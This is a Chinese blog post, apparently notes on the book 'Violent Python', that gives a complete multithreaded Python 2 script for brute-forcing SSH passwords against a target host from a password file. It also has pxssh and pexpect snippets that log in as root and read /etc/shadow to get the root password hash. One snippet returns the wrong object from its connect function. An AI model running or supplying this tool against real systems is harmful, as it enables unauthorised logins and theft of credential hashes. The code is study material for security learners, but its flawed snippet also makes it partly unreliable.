SSH暴力破解之Python-pxssh实现

最近在看《Violent Python》,记录一些代码实现。

0x00 SSH暴力破解之Python-pexssh实现

Pxssh是一个包含了pexpect库的专用脚本,它能用预先写好的login()、logout()、prompt()等函数直接与SSH进行交互。

简单示例:

import pxssh
def send_command(s, cmd):
    s.sendline(cmd)
	s.prompt()
	print s.before
def connect(host, user, password):
	try:
	    # Init a pxssh object
	    s = pxssh.pxssh()
	    s.login(host, user, password)
	    return send_command
	except:
	    print '[-] Error Connecting'
		exit(0)
s = connect('127.0.0.1', 'root', 'root')
send_command(s, 'cat /etc/shadow | grep root')
0x01 代码实现

import pxssh
import optparse
import time
from threading import *
# Set maxconnections of threads
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    # User the global variables
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        #  Try login with user/password
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read_nonblocking' in str(e):
            Fails += 1
            time.sleep(5)
            # Try again
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            # Try again
            connect(host, user, password, False)
    finally:
        # If get a wrong-pass answer, then release a thread-lock
        if release:
            connection_lock.release()
def main():
    parser = optparse.OptionParser("usage%prog -H  -u  -F ")
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    user = options.user
    passwdFile = options.passwdFile
    if (host == None) | (user == None) | (passwdFile == None):
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
	if Found:
            # If passwdFile enum ends before a thread found the passwd, 'Exiting...' will not be able to echo on the screen
            print "[*] Exiting: Password  Found"
            exit(0)
        if Fails > 5:
            print "[!] Exiting: Too Many Socket Timeouts"
            exit(0)
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] Testing: " + str(password)
        t = Thread(target = connect, args = (host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()
0x02 效果

SSH暴力破解之Python-pxssh实现_第1张图片
0x03 pexpect后记

使用pexpect库得安装ptyprocess,链接:

https://pypi.python.org/pypi/ptyprocess
https://pypi.python.org/pypi/pexpect

建议先了解pexpect库,pxssh毕竟只是一个SSH定制化的库,pexpect库还是很强大的,尤其是显示与程序的交互和等待预期屏幕输出,并给出不同响应。

简单示例:

import pexpect
PROMPT = ['# ', '>>> ', '> ', '\$ ']
def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print child.before
def connect(user, host, password):
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    child = pexpect.spawn(connStr)
    print 'Ready to execut: ' + connStr
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:'])
    if ret == 0:
        print '[-] Error Connecting'
        return
    if ret == 1:
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:'])
    if ret == 0:
        print 'Error Connecting'
        return
    child.sendline(password)
    child.expect(PROMPT)
    return child
def main():
    host = '192.168.226.134'
    user = 'root'
    password = 'toor'
    child = connect(user, host, password)
    if child != None:
        send_command(child, 'cat /etc/shadow |grep root')
if __name__ == '__main__':
    main()

have fun~


你可能感兴趣的:(Python)